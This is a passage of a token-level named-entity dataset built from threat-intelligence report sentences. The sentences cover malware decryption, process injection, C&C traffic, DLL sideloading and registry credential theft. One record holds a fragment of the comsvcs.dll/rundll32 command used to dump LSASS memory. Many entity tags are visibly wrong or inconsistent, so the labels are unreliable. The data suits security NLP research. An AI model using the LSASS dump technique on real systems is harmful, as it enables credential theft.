"the", "packed", "and", "encoded", "malicious", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decryption", "routine", "is", "executed", "that", "decrypts", "the", "remaining", "malicious", "code", "in", "the", ".kxrt", "section", "and", "writes", "it", "to", "the", "virtual", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decoder", "routine", "to", "decrypt", "the", "beacon", "DLL." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "The", "decrypted", "malicious", "code" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Once", "decoded,", "the", "loader's", "execution", "jumps", "to", "the", "beginning", "of", "the", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "now", "responsible", "for", "decoding", "the", "configuration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "calling", "WinHTTPGetProxyForUrlEx", "and", "WinHTTPCreateProxyResolver" ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "calls", "the", "VirtualProtect", "function" ], "ner_tags": [ "B-Features", "O", "O", "O" ] }, { "tokens": [ "modifies", "the", "victim's", "system", "power", "and", "lid", "open/close", "policies", "in", "the", "registry." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "also", "manage", "the", "system", "power", "policies", "registry", "keys", "to", "set", "the", "minimum", "and", "maximum", "sleep", "times", "and", "the", "lid", "open", "and", "close", "action", "policy." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "routed", "through", "European", "TOR", "VPN", "exit", "nodes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VPN", "access", "using", "Single", "Factor", "authentication." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Minidump", "of", "LSASS", "process", "memory" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "The", "minidump", "function", "of", "comsvcs.dll", "can", "be", "used", "to", "dump", "lsass.exe." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "leveraging", "comsvcs.dll", "with", "proxy", "execution", "by", "rundll32.exe." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "do", "rundll32.exe", "C:\\windows\\System32\\comsvcs.dll," ], "ner_tags": [ "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "Conducting", "discovery", "indirectly", "via", "schedule", "tasks", "named", "“Windows", "Update”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam" ] }, { "tokens": [ "performing", "remote", "directory", "listings." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "discover", "interesting", "to", "them", "directories" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Leveraging", "a", "dual-use", "tool,", "PCHunter64,", "to", "acquire", "detailed", "process", "and", "system", "information." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "can", "use", "windows", "binaries", "and", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "connection", "established" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "Remote", "Desktop", "Protocol", "(RDP),", "and", "the", "threat", "actor", "was", "able", "to", "move", "freely", "across", "the", "network" ], "ner_tags": [ "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "was", "able", "to", "RDP", "unencumbered", "across", "the", "organization’s", "infrastructure." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "executed", "two", "actions", "to", "bypass", "Windows", "Defender" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "leveraged", "one", "of", "the", "most", "popular", "dual-use", "agents,", "AnyDesk,", "to", "provide", "persistent", "remote", "access", "into", "the", "affected", "organization", "on", "multiple", "systems." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Purp", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "several", "files", "were", "staged", "for", "possible,", "but", "unconfirmed", "exfiltration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "spear", "phishing", "emails", "that", "contain", "a", ".csv", "or", ".xlt", "file", "attachment" ], "ner_tags": [ "I-Way", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "email", "is", "directed", "to", "“Non-Resident", "Alien”", "tax", "payers", "to", "have", "them", "fill", "out", "a", "PDF", "file", "(that", "is", "attached", "to", "the", "email)" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "a", "cyber-attack", "in", "the", "form", "of", "credential", "stuffing," ], "ner_tags": [ "O", "B-Org", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Enduring", "Credential", "Stuffing" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "using", "login", "credentials", "from", "what", "the", "company", "suspects", "are", "past", "data", "breaches", "from", "other", "companies" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "replace", "the", "“ServiceManager.exe”", "file", "from", "the", "driver", "folder", "with", "a", "malicious", "file", "to", "trick", "the", "driver", "into", "running", "the", "tainted", "file" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "log", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "a", "vulnerability", "in", "unencrypted", "Wi-Fi", "routers", "that", "makes", "them", "susceptible", "to", "a", "TCP", "exploit." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "A", "threat", "actor", "could", "take", "advantage", "of", "this", "vulnerability", "by", "creating", "a", "specific", "file", "that", "contains", "data", "that", "is", "stored", "in", "the", "JET", "database", "format,", "and", "having", "the", "targeted", "user", "open", "it,", "which", "would", "then", "allow", "for", "remote", "code", "execution", "at", "the", "level", "of", "the", "current", "process" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "vulnerability,", "registered", "as", "“CVE-2018-14327,”", "allows", "a", "low-privileged", "user", "account", "to", "escalate", "privileges", "on", "any", "Windows", "machine", "that", "had", "connected", "to", "the", "EE", "Mini", "modem", "via", "USB." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "that", "specific", "payload", "code" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "threat", "actor", "could", "establish", "an", "administrator", "session" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "payload", "download", "code", "that", "grabs", "malware", "to", "download", "and", "install", "the", "backdoor." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "sign", "on", "as", "a", "legitimate", "user" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "database", "passwords", "from", "Windows", "registry", "values" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "them", "from", "Windows", "registry", "values" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "more", "sensitive", "data", "in", "the", "user’s", "database." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt", "these", "database", "passwords," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "decryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "decrypts", "the", "password" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted", "dba", "user", "password." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "this", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypting", "the", "appropriate", "loader" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "decrypts", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypting", "them" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "gather", "database", "passwords" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "steal", "database", "passwords", "and", "configuration", "information" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "steal", "credentials", "by", "decrypting", "them", "from", "registry", "values." ], "ner_tags": [ "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exfiltrated", "credentials" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypt", "these", "database", "passwords" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "password", "for", "the", "dba", "username" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "dba", "user", "password." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "successfully", "obtain", "the", "database", "passwords" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "steal", "credentials", "by", "decrypting", "them", "from", "registry", "values" ], "ner_tags": [ "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "encryption", "key", "for", "sensitive", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted" ], "ner_tags": [ "O" ] }, { "tokens": [ "encryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "encryption" ], "ner_tags": [ "O" ] }, { "tokens": [ "XORed", "with", "the", "value" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "using", "its", "own", "XOR", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "write", "module", "to", "the", "encrypted", "storage" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "unpacks", "and", "loads", "the", "next", "stage", "of", "the", "malware,", "namely", "the", "main", "module" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "unpacking", "the", "main", "module", "and" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "handles", "communication", "between", "the", "modules", "and", "attacker’s", "C&C", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "0x10000013data", "for", "C&C", "server", "(execution", "logs,", "stolen", "data,", "…)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "upload", "data", "to", "C&C" ], "ner_tags": [ "B-Features", "B-Features", "O", "O" ] }, { "tokens": [ "exfiltrates", "data", "over", "its", "C&C", "channel." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "acquire", "a", "list", "of", "the", "running", "processes", "and", "their", "loaded", "modules" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "information", "about", "currently", "running", "processes,", "including:", "name,", "process", "identifier", "(PID),", "parent", "process", "PID,", "number", "of", "threads,", "token", "owner,", "token", "domain,", "process", "creation", "time,", "and", "command", "line" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "B-HackOrg", "O", "I-Features", "O", "I-Features", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "information", "about", "loaded", "modules", "for", "each", "of", "the", "running", "processes" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "0x10000025get", "handle", "of", "the", "process", "with", "specified", "PID" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enumerates", "running", "processes" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "get", "information", "about", "processes", "running", "on", "a", "system" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "in", "DataS5", "(for", "dba)", "and", "DataS6", "(for", "micros)", "registry", "values", "within", "one", "of", "the", "following", "registry", "keys" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "registry", "Run", "key" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "GetComputerName", "API" ], "ner_tags": [ "B-Way", "B-Tool" ] }, { "tokens": [ "GetTickCount", "Windows", "API" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "PeekNamedPipe", "Windows", "API", "function" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "information", "about", "specific", "registry", "keys" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "queries", "the", "Registry", "for", "ORACLE", "MICROS", "RES", "3700", "POS", "version,", "database", "passwords", "and", "other", "configuration", "data" ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "injected", "into", "one", "of", "the", "processes", "specified", "by", "the", "C&C" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "module", "is", "injected", "into", "one", "of", "the", "processes", "specified", "by", "the", "C&C" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "injected", "only", "into", "processes", "running", "under", "WOW64." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "its", "injection", "into", "one", "of", "the", "following", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "0x10000012inject", "and", "execute", "received", "module", "in", "specified", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "first," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "inject", "a", "networking", "module" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "inject", "processes", "that", "are", "expected", "to", "communicate", "over", "the", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "0x0AInject", "and", "execute", "received", "module", "in", "specified", "process" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "0x0BInject", "and", "execute", "received", "module", "in", "specified", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "inject", "and", "execute", "received", "module", "in", "specified", "process" ], "ner_tags": [ "B-Features", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "scanning", "selected", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "scan", "specific", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "IP", "addresses", "intended", "for", "scanning", "and", "the", "special", "“ping”", "IP", "address" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "scanning", "IPs", "specified", "in", "the", "command", "data", "to", "collect", "additional", "information", "about", "the", "environment" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "scan", "of", "the", "selected", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloaded", "from", "the", "C&C", "along", "with", "the", "ModScan", "module" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "parsing", "payload", "received", "in", "the", "C&C", "responses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "additional", "payloads", "and", "C&C", "commands" ], "ner_tags": [ "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "TCP", "ports", "50123" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "and", "2638" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "by", "sending", "a", "specially", "crafted", "TCP", "packet" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Way" ] }, { "tokens": [ "sends", "a", "hardcoded", "TDS", "4.2", "&", "5.0", "Login", "Packet", "(Figure", "6)", "to", "the", "specified", "IP", "address", "on", "port", "2638" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "transmitted", "using", "the", "lightweight", "networking", "module," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Version", "of", "the", "Oracle" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "information", "about", "the", "database", "server", "and", "the", "TDS", "versions", "used" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sending", "an", "HTTP", "Post", "message" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "module", "uses", "HTTP", "and", "port", "80." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "avoid", "system", "processes", "that", "might", "attract", "attention", "if", "caught", "communicating", "over", "the", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "POST", "or", "GET", "methods" ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "HTTP", "for", "command", "and", "control" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "between", "data", "xml", "tags", "(<data>%version%</data>)", "of", "the", "response", "from", "the", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "payload,", "containing", "the", "main", "functionality", "of", "the", "dropper,", "is", "stored", "in", "the", "dropper’s", "resources", "as", "bitmaps", "named", "from", "A", "to", "L." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "being", "the", "payloads", "stored", "in", "the", "resources" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "within", "the", "main", "module’s", "code." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "with", "username", "set", "to", "the", "built-in", "dba", "and", "a", "hardcoded", "password,", "which", "is", "potentially", "the", "default", "password", "in", "some", "RES", "3700", "POS", "versions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hash", "of", "the", "dropped", "loader", "to", "change", "with", "each", "execution," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "a", "Windows", "service" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "create", "a", "new", "service", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decompiled", "code", "responsible", "for", "loading", "the", "payload", "from", "the", "binary’s", "resources," ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Communication", "with", "the", "C&C", "is", "encrypted", "using", "AES", "in", "CBC", "mode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "XORed", "with", "the", "first", "4", "bytes", "of", "the", "AES", "key", "used", "to", "encrypt", "the", "message." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "encrypts", "communication", "with", "C&C", "using", "AES", "in", "CBC", "mode" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "using", "Windows", "Command", "Shell", "to", "execute", "the", "initial", "dropper." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "Registry", "Run", "key", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "inject", "it’s", "modules", "into", "various", "processes." ], "ner_tags": [ "B-SamFile", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "gathers", "username", "and", "computer", "name", "from", "victim", "machines", "and", "reports", "them", "to", "the", "C&C", "in", "initial", "message." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "attack", "revolves", "around", "a", "DLL", "sideloading" ], "ner_tags": [ "O", "B-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "sideloading", "scenario,", "the", "malicious", "loader", "(ffmpeg.dll)", "would", "replace", "the", "clean", "dependency;" ], "ner_tags": [ "B-SamFile", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "DLL", "sideloading" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "DLL", "sideloading" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "encoded", "malware" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "encrypted", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "malicious", "encoded", ".ico", "payload" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "generate", "the", "HTTP", "request" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "these", "appear", "to", "be", "maliciously", "patched", "versions", "of", "the", "legitimate", "ffmpeg.dll" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "GetSystemTimeAsFileTime", "Api", "call" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "which", "initiates", "the", "payload", "download" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "tries", "to", "login", "and", "get", "access", "to", "the", "victim", "server", "via", "brute", "force." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "tries", "to", "get", "access", "to", "the", "server", "via", "brute", "force" ], "ner_tags": [ "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "samples", "are", "packed", "with", "UPX", "Packer." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Upon", "unpacking", "a", "sample" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "uses", "a", "set", "of", "credentials", "that", "is", "hard", "coded", "into", "the", "malware", "binary," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hard-coded", "credentials", "for", "brute", "forcing." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "from", "the", "decrypted", "configuration" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "then", "de-XORs", "other", "strings,", "with", "the", "hard-coded", "key" ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Most", "of", "the", "strings", "are", "de-XOR’d", "in", "a", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "simply", "de-XOR", "the", "entire", "binary" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Also", "the", "de-XOR’d", "strings," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "malware", "has", "de-XOR’d", "all", "its", "strings,", "it", "invokes", "a", "method", "named", "go." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "find", "an", "XOR", "loop", "that", "decrypts", "this", "configuration." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "as", "a", "hard-coded", "XOR", "key" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "find", "an", "XOR", "loop" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "produces", "strings", "including", "a", "commandline", "usage:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "be", "set", "via", "the", "command-line", "as", "well." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "parses", "command-line", "options" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "data", "will", "be", "published", "on", "our", "TOR", "darknet", "sites." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "this", "snippet", "of", "code", "invokes", "ptrace", "with", "PT_DENY_ATTACH", "(0x1f)", "which", "will", "kill", "the", "process", "if", "a", "debugger", "is", "currently", "attached," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "embedded", ".NET", "injector", "and", "PE", "payload(s)." ], "ner_tags": [ "O", "B-SamFile", "B-SamFile", "B-SecTeam", "O", "B-Way", "O" ] }, { "tokens": [ "embedded", "payloads", "of", "one", "of", "the", "IronPython", "scripts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "main", "task", "of", "loading", "malware", "is", "done", "by", "an", "embedded", "process", "injector." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IronNetInjector", "is", "made", "of", "an", "IronPython", "script", "that", "contains", "a", ".NET", "injector", "and", "one", "or", "more", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Contain", "an", "encrypted", ".NET", "injector", "and", "one", "or", "more", "encrypted", "PE", "payloads." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Embedded", ".NET", "injector", "and", "payload(s)", "are", "encoded", "with", "Base64", "and", "encrypted", "with", "Rijndael." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "script", "with", "embedded", ".NET", "injector", "and", "ComRAT", "payload" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "B-Way", "O" ] }, { "tokens": [ "the", "embedded", "payloads", "in", "the", "IronPython", "scripts," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "embedded", "malware:" ], "ner_tags": 